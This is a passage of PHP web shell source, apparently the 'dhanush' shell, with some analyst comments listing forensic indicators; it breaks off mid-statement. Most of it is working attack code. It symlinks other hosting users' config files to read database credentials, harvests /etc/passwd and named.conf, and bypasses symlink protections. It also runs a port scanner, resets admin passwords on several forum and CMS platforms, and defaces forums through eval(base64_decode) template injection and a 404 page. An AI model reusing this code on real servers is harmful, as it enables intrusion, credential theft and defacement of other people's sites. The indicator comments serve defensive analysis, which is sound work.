1325 symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1326 symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1327 symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1328 symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1329 symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1330 symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1331 symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1332 symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1333 symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1334 symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1335 symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1336 }
1337 if(isset($_REQUEST['passwd']))
1338 {
1339 $getetc = trim($_REQUEST['passwd']);
1340
1341 mkdir("dhanushSPT");
1342 chdir("dhanushSPT");
1343
1344 $myfile = fopen("test.txt","w");
1345 fputs($myfile,$getetc);
1346 fclose($myfile);
1347
1348 $file = fopen("test.txt", "r") or exit("Unable to open file!");
1349 while(!feof($file))
1350 {
1351 $s = fgets($file);
1352 $matches = array();
1353 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1354 $matches = str_replace("home/","",$matches[1]);
1355 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1356 continue;
1357 syml($matches,$matches);
1358 }
1359 fclose($file);
1360 unlink("test.txt");
1361 echo "<center><font class=txt size=3>[ Done ]</font></center>";
1362 echo "<br><center><a href=".$url."dhanushSPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
1363
1364 }
1365 else
1366 {
1367 $d0mains = @file("/etc/named.conf");
1368 if($d0mains)
1369 {
1370 mkdir("dhanushST");
1371 chdir("dhanushST");
1372
1373 foreach($d0mains as $d0main)
1374 {
1375 if(eregi("zone",$d0main))
1376 {
1377 preg_match_all('#zone "(.*)"#', $d0main, $domains);
1378 flush();
1379
1380 if(strlen(trim($domains[1][0])) > 2)
1381 {
1382 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1383
1384 syml($user['name'],$domains[1][0]);
1385 }
1386 }
1387 }
1388 echo "<center><font class=txt size=3>[ Done ]</font></center>";
1389 echo "<br><center><a href=".$url."dhanushST target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
1390 }
1391 else
1392 {
1393 mkdir("dhanushSPT");
1394 chdir("dhanushSPT");
1395 $temp = "";
1396 $val1 = 0;
1397 $val2 = 1000;
1398 for(;$val1 <= $val2;$val1++)
1399 {
1400 $uid = @posix_getpwuid($val1);
1401 if ($uid)
1402 $temp .= join(':',$uid)."\n";
1403 }
1404 echo '<br/>';
1405 $temp = trim($temp);
1406
1407 $file5 = fopen("test.txt","w");
1408 fputs($file5,$temp);
1409 fclose($file5);
1410
1411
1412 $file = fopen("test.txt", "r") or exit("Unable to open file!");
1413 while(!feof($file))
1414 {
1415 $s = fgets($file);
1416 $matches = array();
1417 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1418 $matches = str_replace("home/","",$matches[1]);
1419 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1420 continue;
1421 syml($matches,$matches);
1422 }
1423 fclose($file);
1424 echo "</table>";
1425 unlink("test.txt");
1426 echo "<center><font class=txt size=3>[ Done ]</font></center>";
1427 echo "<br><center><a href=".$url."dhanushSPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
1428 }
1429 }
1430 }
1431 else
1432 echo "<center>Cannot Complete the task!!!!</center>";
1433
1434}
else if(isset($_GET["symlinkfile"]))
{
 // Analyst note: input form for the single-file symlink feature. The target defaults to
 // /etc/passwd and the getdata() JS helper routes the submission to the 'symlinkmyfile'
 // branch below. When ?file= is already present nothing at all is rendered -- there is
 // no else arm.
 if(!isset($_GET['file']))
 {
 ?>
 <center>
 <form onSubmit="getdata('symlinkmyfile',file.value);return false;">
 <input type="text" class="box" name="file" size="50" value="/etc/passwd">
 <input type="button" value="Create Symlink" onClick="getdata('symlinkmyfile',file.value)" class="but">
 </form></center>
 <br><br>
 <?php
 }
}
1449
else if(isset($_GET['symlinkmyfile']))
{
 // Analyst note: arbitrary-path symlink primitive of this web shell. It only runs when
 // php_uname() reports Linux. The link target comes straight from ?myfile= with no
 // validation. Everything is created relative to the shell's current working directory
 // (normally the directory it was dropped in), which gives these on-disk indicators:
 //   - a 16-deep chain of directories named "cx" ($fakedir / $fakedep)
 //   - a directory tree mirroring the requested path under the outermost "cx"
 //     (e.g. cx/etc/passwd as directories, not files)
 //   - "fakesymlink", first a symlink and afterwards an empty real directory
 //   - "symlink0", "symlink1", ... links next to the shell
 if(stristr(php_uname(),"Linux"))
 {
 $fakedir="cx";
 $fakedep=16;

 $num=0; // offset of symlink.$num

 if(!empty($_GET['myfile']))
 $file=$_GET['myfile'];
 else $file="";

 if(empty($file))
 exit;

 // Only a warning; the branch carries on even if the directory is not writable.
 if(!is_writable("."))
 echo "not writable directory";

 $level=0; // assigned, never read

 // Create and descend cx/cx/.../cx ($fakedep levels), then climb back up 15 levels so
 // the cwd ends on the outermost "cx" with $as left at 0.
 for($as=0;$as<$fakedep;$as++)
 {
 if(!file_exists($fakedir))
 mkdir($fakedir);
 chdir($fakedir);
 }

 while(1<$as--) chdir("..");

 // Recreate every component of the requested path as a real directory under that
 // "cx", counting each level in $as so the climb back to the original cwd is exact.
 $hardstyle = explode("/", $file);

 for($a=0;$a<count($hardstyle);$a++)
 {
 if(!empty($hardstyle[$a]))
 {
 if(!file_exists($hardstyle[$a]))
 mkdir($hardstyle[$a]);
 chdir($hardstyle[$a]);
 $as++;
 }
 }
 $as++;
 while($as--)
 chdir("..");

 @rmdir("fakesymlink");
 @unlink("fakesymlink");

 // "fakesymlink" -> cx/cx/.../cx/ (16 deep). While it is a symlink, the relative target
 // "fakesymlink/" + "../" x15 + $file resolves into the directory tree built above, i.e.
 // to a path that exists inside this account. Presumably intended to satisfy a
 // host-side check on the symlink target at creation time -- inferred, the code itself
 // does not say.
 @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");

 // Picks the first free "symlink<N>" name. If symlink() is disabled or always fails,
 // this loop never terminates (there is no attempt cap).
 while(1)
 if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
 else $num++;

 // Swap "fakesymlink" for a real, empty directory. From now on "fakesymlink/.." is the
 // shell's own directory and the remaining 14 ".." segments walk up from there (more
 // than a typical web-root depth), so the link resolves $file's components from near
 // the filesystem root instead of from the cx tree.
 @unlink("fakesymlink");
 mkdir("fakesymlink");

 echo '<CENTER>check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</CENTER>';
 }
 else
 echo '<CENTER>Cannot Create Symlink</CENTER>';
}
else if(isset($_REQUEST['404new']))
{
 // Analyst note: editor for the custom 404 / defacement page. The default textarea text
 // "lol! You just got hacked" is a usable content signature for deployed 404.html files.
 // The Save button passes the textarea to the my404page() JS helper (not in view), which
 // feeds the '404page' branch below.
 ?>
 <form>
 <center><textarea name=message cols=100 rows=18 class=box>lol! You just got hacked</textarea></br>
 <input type="button" onClick="my404page(message.value)" value=" Save " class=but></center>
 </br>
 </form>
 <?php
}
else if(isset($_REQUEST['404page']))
{
 // Analyst note: defacement hook. Appends "ErrorDocument 404 <dir>404.html" to the
 // .htaccess in the shell's directory and writes 404.html beside it, so every missing
 // page under that directory serves attacker-controlled content. Indicators: .htaccess
 // lines ending in "404.html \n\r" (note the reversed CR/LF order -- a good grep
 // signature), possibly repeated because the file is opened in append mode on every
 // call, plus a 404.html next to the shell. The trigger is read from $_REQUEST but the
 // page body only from $_POST.
 $url = $_SERVER['REQUEST_URI'];
 $path=explode('/',$url);
 // Drops the last path segment (the shell's own file name, including any query string)
 // to obtain the directory URL. str_replace removes every occurrence of that segment,
 // not only the trailing one.
 $url =str_replace($path[count($path)-1],'',$url);
 if(isset($_POST['message']))
 {
 // Operator-supplied body. Neither file handle is closed in this arm, and the success
 // message is printed even when 404.html could not be opened.
 if($myfile = fopen(".htaccess", "a"))
 {
 fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r");
 if($myfilee = fopen("404.html", "w+"))
 {
 fwrite($myfilee, $_POST['message']);
 }
 echo "<center><font class=txt>Done setting 404 Page !!!!</font></center>";
 }
 else
 echo "<center>Cannot Set 404 Page</center>";
 }
 else if(strlen($ind) != 0)
 {
 // Fallback body: $ind is a base64-encoded page defined elsewhere in the shell.
 if($myfile = fopen(".htaccess", "a"))
 {
 fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r");

 if($myfilee = fopen("404.html", "w+"))
 {
 fwrite($myfilee, base64_decode($ind));

 fclose($myfilee);
 echo "<center><font class=txt>Done setting 404 Page !!!!</font></center>";
 }
 fclose($myfile);
 }
 else
 {
 echo "<center>Cannot Set 404 Page</center>";
 }
 }
 else
 echo "<center>Nothing Specified in the shell</center>";
}
else if(isset($_GET["domains"]))
{
 // Analyst note: "other sites on this IP" view. Embeds a third-party reverse-IP lookup
 // (sameip.org) in an iframe, passing the host's own SERVER_ADDR in the URL. Because it
 // is an iframe, the operator's browser -- not the compromised server -- fetches that
 // URL, so it appears in the viewer's egress logs rather than in the host's outbound
 // traffic; the server address is nonetheless disclosed to that third party.
 ?><center><iframe src="<?php echo 'http://sameip.org/ip/' . getenv('SERVER_ADDR'); ?>" width="80%" height="1000px"></iframe></center><?php
}
1569else if(isset($_GET["symlink"]))
1570{
1571 $d0mains = @file("/etc/named.conf");
1572 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
1573 $path=explode('/',$url);
1574 $url =str_replace($path[count($path)-1],'',$url);
1575 if($d0mains)
1576 {
1577 @mkdir("dhanush",0777);
1578 @chdir("dhanush");
1579 execmd("ln -s / root");
1580 $file3 = 'Options all
1581 DirectoryIndex Sux.html
1582 AddType text/plain .php
1583 AddHandler server-parsed .php
1584 AddType text/plain .html
1585 AddHandler txt .html
1586 Require None
1587 Satisfy Any
1588 ';
1589 $fp3 = fopen('.htaccess','w');
1590 $fw3 = fwrite($fp3,$file3);
1591 @fclose($fp3);
1592 echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr align =center><td align=center><font size=3 >S. No.</font></td><td align=center><font size=3 >Domains</font></td><td align=center><font size=3 >Users</font></td><td align=center><font size=3 >Symlink</font></td><td align=center><font size=3 >Information</font></td></tr>";
1593
1594 $dcount = 1;
1595 foreach($d0mains as $d0main)
1596 {
1597 if(eregi("zone",$d0main))
1598 {
1599 preg_match_all('#zone "(.*)"#', $d0main, $domains);
1600 flush();
1601
1602 if(strlen(trim($domains[1][0])) > 2)
1603 {
1604 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1605
1606 echo "<tr align=center><td><font class=txt>" . $dcount . "</font></td><td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td><td><font class=txt>".$user['name']."</font></td><td><a href=".$url."dhanush/root/home/".$user['name']."/public_html target='_blank'><font class=txt>Symlink</font></a></td><td><font class=txt><a href=?info=".$domains[1][0]." target=_blank>info</a></font></td></tr>"; flush();
1607 $dcount++;
1608 }
1609 }
1610
1611 }
1612 echo "</table>";
1613 }
1614 else
1615 {
1616 if(stristr(php_uname(),"Linux"))
1617 {
1618 ?>
1619 <div style="float:left;position:fixed;">
1620 <form>
1621 <table cellpadding="9">
1622 <tr>
1623 <th colspan="2">Get User Name</th>
1624 </tr>
1625 <tr>
1626 <td>Enter Website Name :</td>
1627 <td><input type="text" name="sitename" value="sitename.com" class="sbox"></td>
1628 </tr>
1629 <tr>
1630 <td align="center" colspan="2"><input type="button" onClick="getname(sitename.value)" value=" Get IT " class="but"></td>
1631 </tr>
1632 <tr>
1633 <td colspan=2 align=center><div style="width:250px;" id="showsite"></div></td>
1634 </tr>
1635 </table>
1636 </form>
1637 </div>
1638 <?php
1639 $TEST=@file('/etc/passwd');
1640 if ($TEST)
1641 {
1642 @mkdir("dhanush",0777);
1643 @chdir("dhanush");
1644 execmd("ln -s / root");
1645 $file3 = 'Options all
1646 DirectoryIndex Sux.html
1647 AddType text/plain .php
1648 AddHandler server-parsed .php
1649 AddType text/plain .html
1650 AddHandler txt .html
1651 Require None
1652 Satisfy Any
1653 ';
1654 $fp3 = fopen('.htaccess','w');
1655 $fw3 = fwrite($fp3,$file3);
1656 @fclose($fp3);
1657
1658 echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Users</font></td><td align=center><font size=3 >Symlink</font></td></tr>";
1659
1660 $dcount = 1;
1661 $file = fopen("/etc/passwd", "r");
1662 //Output a line of the file until the end is reached
1663 while(!feof($file))
1664 {
1665 $s = fgets($file);
1666 $matches = array();
1667 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1668 $matches = str_replace("home/","",$matches[1]);
1669 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1670 continue;
1671 echo "<tr><td align=center><font size=3 class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $matches . "</td>";
1672 echo "<td align=center><font size=3 class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
1673 $dcount++;
1674 }
1675 fclose($file);
1676
1677 echo "</table>";
1678 }
1679 else
1680 {
1681 @mkdir("dhanush",0777);
1682 @chdir("dhanush");
1683 execmd("ln -s / root");
1684 $file3 = 'Options all
1685 DirectoryIndex Sux.html
1686 AddType text/plain .php
1687 AddHandler server-parsed .php
1688 AddType text/plain .html
1689 AddHandler txt .html
1690 Require None
1691 Satisfy Any
1692 ';
1693 $fp3 = fopen('.htaccess','w');
1694 $fw3 = fwrite($fp3,$file3);
1695 @fclose($fp3);
1696
1697 echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Users</font></td><td align=center><font size=3 >Symlink</font></td></tr>";
1698
1699 $temp = "";
1700 $val1 = 0;
1701 $val2 = 1000;
1702 for(;$val1 <= $val2;$val1++)
1703 {
1704 $uid = @posix_getpwuid($val1);
1705 if ($uid)
1706 $temp .= join(':',$uid)."\n";
1707 }
1708 echo '<br/>';
1709 $temp = trim($temp);
1710
1711 $file5 = fopen("test.txt","w");
1712 fputs($file5,$temp);
1713 fclose($file5);
1714
1715 $dcount = 1;
1716 $file = fopen("test.txt", "r");
1717 while(!feof($file))
1718 {
1719 $s = fgets($file);
1720 $matches = array();
1721 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1722 $matches = str_replace("home/","",$matches[1]);
1723 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1724 continue;
1725 echo "<tr><td align=center><font size=3 class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $matches . "</td>";
1726 echo "<td align=center><font size=3 class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
1727 $dcount++;
1728 }
1729 fclose($file);
1730 echo "</table>";
1731 unlink("test.txt");
1732 }
1733 }
1734 else
1735 echo "<center><font size=4 >Cannot create Symlink</font></center>";
1736 }
1737}
1738else if(isset($_GET['host']) && isset($_GET['protocol']))
1739{
1740 echo "Open Ports: ";
1741 $host = $_GET['host'];
1742 $proto = $_GET['protocol'];
1743 $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
1744 for($current = 0; $current <= 23; $current++)
1745 {
1746 $currents = $myports[$current];
1747 $service = getservbyport($currents, $proto);
1748 // Try to connect to port
1749 $result = fsockopen($host, $currents, $errno, $errstr, 1);
1750 // Show results
1751 if($result)
1752 echo "<font class=txt>$currents, </font>";
1753 }
1754}
1755else if(isset($_REQUEST['forumpass']))
1756{
1757 $localhost = $_GET['f1'];
1758 $database = $_GET['f2'];
1759 $username = $_GET['f3'];
1760 $password = $_GET['f4'];
1761 $prefix = $_GET['prefix'];
1762 $newpass = $_GET['newpass'];
1763 $uid = $_GET['uid'];
1764
1765 if($_GET['forums'] == "vb")
1766 {
1767 $newpass = $_GET['newipbpass'];
1768 $uid = $_GET['ipbuid'];
1769 $con = mysql_connect($localhost,$username,$password);
1770 $db = mysql_select_db($database,$con);
1771 $salt = "eghjghrtd";
1772 $newpassword = md5(md5($newpass) . $salt);
1773 if($prefix == "" || $prefix == null)
1774 $sql = mysql_query("update user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
1775 else
1776 $sql = mysql_query("update ".$prefix."user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
1777 if($sql)
1778 {
1779 mysql_close($con);
1780 echo "<font class=txt>Password Changed Successfully</font>";
1781 }
1782 else
1783 echo "Cannot Change Password";
1784 }
1785 else if($_GET['forums'] == "mybb")
1786 {
1787 $newpass = $_GET['newipbpass'];
1788 $uid = $_GET['ipbuid'];
1789 $con = mysql_connect($localhost,$username,$password);
1790 $db = mysql_select_db($database,$con);
1791 $salt = "jeghj";
1792 $newpassword = md5(md5($salt).md5($newpass));
1793 if($prefix == "" || $prefix == null)
1794 $sql = mysql_query("update mybb_users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
1795 else
1796 $sql = mysql_query("update ".$prefix."users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
1797 if($sql)
1798 {
1799 mysql_close($con);
1800 echo "<font class=txt>Password Changed Successfully</font>";
1801 }
1802 else
1803 echo "Cannot Change Password";
1804 }
1805 else if($_GET['forums'] == "smf")
1806 {
1807 $newpass = $_GET['newipbpass'];
1808 $uid = $_GET['ipbuid'];
1809 $con = mysql_connect($localhost,$username,$password);
1810 $db = mysql_select_db($database,$con);
1811
1812 if($prefix == "" || $prefix == null)
1813 {
1814 $result = mysql_query("select member_name from smf_members where id_member = $uid");
1815 $row = mysql_fetch_array($result);
1816 $membername = $row['member_name'];
1817 $newpassword = sha1(strtolower($membername).$newpass);
1818 $sql = mysql_query("update smf_members set passwd = '$newpassword' where id_member = '$uid'");
1819 }
1820 else
1821
1822 {
1823 $result = mysql_query("select member_name from ".$prefix."members where id_member = $uid");
1824 $row = mysql_fetch_array($result);
1825 $membername = $row['member_name'];
1826 $newpassword = sha1(strtolower($membername).$newpass);
1827 $sql = mysql_query("update ".$prefix."members set passwd = '$newpassword' where id_member = '$uid'");
1828 }
1829 if($sql)
1830 {
1831 mysql_close($con);
1832 echo "<font class=txt>Password Changed Successfully</font>";
1833 }
1834 else
1835 echo "Cannot Change Password";
1836 }
1837 else if($_GET['forums'] == "phpbb")
1838 {
1839 $newpass = $_POST['newipbpass'];
1840 $uid = $_POST['ipbuid'];
1841 $con = mysql_connect($localhost,$username,$password);
1842 $db = mysql_select_db($database,$con);
1843
1844 $newpassword = md5($newpass);
1845 if(empty($prefix) || $prefix == null)
1846 $sql = mysql_query("update phpb_users set user_password = '$newpassword' where user_id = '$uid'");
1847 else
1848 $sql = mysql_query("update ".$prefix."users set user_password = '$newpassword' where user_id = '$uid'");
1849 if($sql)
1850 {
1851 mysql_close($con);
1852 echo "<font class=txt>Password Changed Successfully</font>";
1853 }
1854 else
1855 echo "Cannot Change Password";
1856 }
1857 else if($_GET['forums'] == "ipb")
1858 {
1859 $newpass = $_POST['newipbpass'];
1860 $uid = $_POST['ipbuid'];
1861 $con = mysql_connect($localhost,$username,$password);
1862 $db = mysql_select_db($database,$con);
1863 $salt = "eghj";
1864 $newpassword = md5(md5($salt).md5($newpass));
1865 if($prefix == "" || $prefix == null)
1866 $sql = mysql_query("update members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
1867 else
1868 $sql = mysql_query("update ".$prefix."members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
1869 if($sql)
1870 {
1871 mysql_close($con);
1872 echo "<font class=txt>Password Changed Successfully</font>";
1873 }
1874 else
1875 echo "Cannot Change Password";
1876 }
1877 else if($_GET['forums'] == "wp")
1878 {
1879 $uname = $_GET['uname'];
1880 $con = mysql_connect($localhost,$username,$password);
1881 $db = mysql_select_db($database,$con);
1882
1883 $newpassword = md5($newpass);
1884 if($prefix == "" || $prefix == null)
1885 $sql = mysql_query("update wp_users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'");
1886 else
1887 $sql = mysql_query("update ".$prefix."users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'");
1888 if($sql)
1889 {
1890 mysql_close($con);
1891 echo "<font class=txt>Password Changed Successfully</font>";
1892 }
1893 else
1894 echo "Cannot Change Password";
1895 }
1896 else if($_GET['forums'] == "joomla")
1897 {
1898 $newjoomlapass = $_GET['newjoomlapass'];
1899 $joomlauname = $_GET['username'];
1900 $con = mysql_connect($localhost,$username,$password);
1901 $db = mysql_select_db($database,$con);
1902
1903 $newpassword = md5($newjoomlapass);
1904 if($prefix == "" || $prefix == null)
1905 $sql = mysql_query("update jos_users set password = '$newpassword', username = '$joomlauname' where name = 'Super User'");
1906 else
1907 $sql = mysql_query("update ".$prefix."users set password = '$newpassword', username = '$joomlauname' where name = 'Super User' OR name = 'Administrator'");
1908 if($sql)
1909 {
1910 mysql_close($con);
1911 echo "<font class=txt>Password Changed Successfully</font>";
1912 }
1913 else
1914 echo "Cannot Change Password";
1915 }
1916}
1917else if(isset($_POST['forumdeface']))
1918{
1919 $localhost = $_POST['f1'];
1920 $database = $_POST['f2'];
1921 $username = $_POST['f3'];
1922 $password = $_POST['f4'];
1923 $index = $_POST['index'];
1924 $prefix = $_POST['tableprefix'];
1925
1926 if($_POST['forumdeface'] == "vb")
1927 {
1928 $con =@ mysql_connect($localhost,$username,$password);
1929 $db =@ mysql_select_db($database,$con);
1930 $index=str_replace('"','\\"',$index);
1931 $attack = "{\${eval(base64_decode(\'";
1932 $attack .= base64_encode("echo \"$index\";");
1933 $attack .= "\'))}}{\${exit()}}</textarea>";
1934 if($prefix == "" || $prefix == null)
1935 $query = "UPDATE template SET template = '$attack'";
1936 else
1937 $query = "UPDATE ".$prefix."template SET template = '$attack'";
1938 $result =@ mysql_query($query,$con);
1939 if($result)
1940 echo "<center><font class=txt size=4><blink>Vbulletin Forum Defaced Successfully</blink></font></center>";
1941 else
1942 echo "<center><font size=4><blink>Cannot Deface Vbulletin Forum</blink></font></center>";
1943 }
1944 else if($_POST['forumdeface'] == "mybb")
1945 {
1946 $con =@ mysql_connect($localhost,$username,$password);
1947 $db =@ mysql_select_db($database,$con);
1948 $attack = "{\${eval(base64_decode(\'";
1949 $attack .= base64_encode("echo \"$index\";");
1950 $attack .= "\'))}}{\${exit()}}</textarea>";
1951 $attack = str_replace('"',"\\'",$attack);
1952
1953 if($prefix == "" || $prefix == null)
1954 $query = "UPDATE mybb_templates SET template = '$attack'";
1955 else
1956 $query = "UPDATE ".$prefix."templates SET template = '$attack'";
1957 $result =@ mysql_query($query,$con);
1958 if($result)
1959 echo "<center><font class=txt size=4><blink>Mybb Forum Defaced Successfully</blink></font></center>";
1960 else
1961 echo "<center><font size=4><blink>Cannot Deface Mybb Forum</blink></font></center>";
1962 }
1963 else if($_POST['forumdeface'] == "smf")
1964 {
1965 $head = $_POST['head'];
1966 $catid = $_POST['f5'];
1967
1968 $con =@ mysql_connect($localhost,$username,$password);
1969 $db =@ mysql_select_db($database,$con);
1970 if($prefix == "" || $prefix == null)
1971 $query = "UPDATE boards SET name='$head', description='$index' WHERE id_cat='$catid'";
1972 else
1973 $query = "UPDATE ".$prefix."boards SET name='$head', description='$index' WHERE id_cat='$catid'";
1974 $result =@ mysql_query($query,$con);
1975 if($result)
1976 echo "<center><font class=txt size=4><blink>SMF Forum Index Changed Successfully</blink></font></center>";
1977 else
1978 echo "<center><font size=4><blink>Cannot Deface SMF Forum</blink></font></center>";
1979 }
1980 else if($_POST['forumdeface'] == "ipb")
1981 {
1982 $head = $_POST['head'];
1983 $catid = $_POST['f5'];
1984
1985 $IPB = "forums";
1986 $con =@ mysql_connect($localhost,$username,$password);
1987 $db =@ mysql_select_db($database,$con);
1988 if($prefix == "" || $prefix == null)
1989 $result =@mysql_query($query = "UPDATE $IPB SET name = '$head', description = '$index' where id = '$catid'");
1990 else
1991 $result =@mysql_query($query = "UPDATE $prefix.$IPB SET name = '$head', description = '$index' where id = '$catid'");
1992 if($result)
1993 echo "<center><font class=txt size=4><blink>Forum Defaced Successfully</blink></font></center>";
1994 else
1995 echo "<center><font size=4><blink>Cannot Deface Forum</blink></font></center>";
1996 }
1997 else if($_POST['forumdeface'] == "wp")
1998 {
1999 $catid = $_POST['f5'];
2000 $head = $_POST['head'];
2001
2002 $con =@ mysql_connect($localhost,$username,$password);
2003 $db =@ mysql_select_db($database,$con);
2004 if($prefix == "" || $prefix == null)
2005 {
2006 if(isset($_POST["alll"]) && $_POST["alll"] == "All")
2007 $query = "UPDATE wp_posts SET post_title='$head', post_content='$index'";
2008 else
2009 $query = "UPDATE wp_posts SET post_title='$head', post_content='$index' WHERE ID='$catid'";
2010 }
2011 else
2012 {
2013 if(isset($_POST["alll"]) && $_POST["alll"] == "All")
2014 $query = "UPDATE ".$prefix."posts SET post_title='$head', post_content='$index'";
2015 else
2016 $query = "UPDATE ".$prefix."posts SET post_title='$head', post_content='$index' WHERE ID='$catid'";
2017
2018 }
2019 $result =@mysql_query($query,$con) or mysql_error();
2020 if($result)
2021 echo "<center><font class=txt size=4><blink>Wordpress Defaced Successfully</blink></font></center>";
2022 else
2023 echo "<center><font size=4><blink>Cannot Deface Wordpress</blink></font></center>";
2024 }
2025 else if($_POST['forumdeface'] == "joomla")
2026 {
2027 $site_url = $_POST['siteurl'];
2028 $dbprefix = $_POST['tableprefix'];
2029 $dbname = $_POST['f2'];
2030 $h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['index']))))."'))); exit; ?>";
2031
2032 function randomt()
2033 {
2034 $chars = "abcdefghijkmnopqrstuvwxyz023456789";
2035 srand((double)microtime()*1000000);
2036 $i = 0;
2037 $pass = '' ;
2038
2039 while ($i <= 7)
2040 {
2041 $num = rand() % 33;
2042 $tmp = substr($chars, $num, 1);
2043 $pass = $pass . $tmp;
2044 $i++;
2045 }
2046
2047 return $pass;
2048 }
2049 function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)
2050 {
2051 $ar0=explode($marqueurDebutLien, $text);
2052 $ar1=explode($marqueurFinLien, $ar0[$i]);
2053 $ar=trim($ar1[0]);
2054 return $ar;
2055 }
2056 $co=randomt();
2057
2058 $link=mysql_connect($localhost,$username,$password) ;
2059 mysql_select_db($dbname,$link);
2060
2061 $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
2062
2063 $req =mysql_query("SELECT * from `".$dbprefix."extensions` ");
2064
2065 if ( $req )
2066 {
2067 $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
2068 $data = mysql_fetch_array($req);
2069 $template_name=$data["template"];
2070
2071 $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'");
2072 $data = mysql_fetch_array($req);
2073 $template_id=$data["extension_id"];
2074
2075 $url2=$site_url."/index.php";
2076
2077 $ch = curl_init();
2078 curl_setopt($ch, CURLOPT_URL, $url2);
2079 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2080 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2081 curl_setopt($ch, CURLOPT_HEADER, 1);
2082 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2083 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2084 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2085
2086
2087 $buffer = curl_exec($ch);
2088
2089 $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
2090 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
2091
2092
2093 $url2=$site_url."/index.php";
2094 $ch = curl_init();
2095 curl_setopt($ch, CURLOPT_URL, $url2);
2096 curl_setopt($ch, CURLOPT_POST, 1);
2097 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");
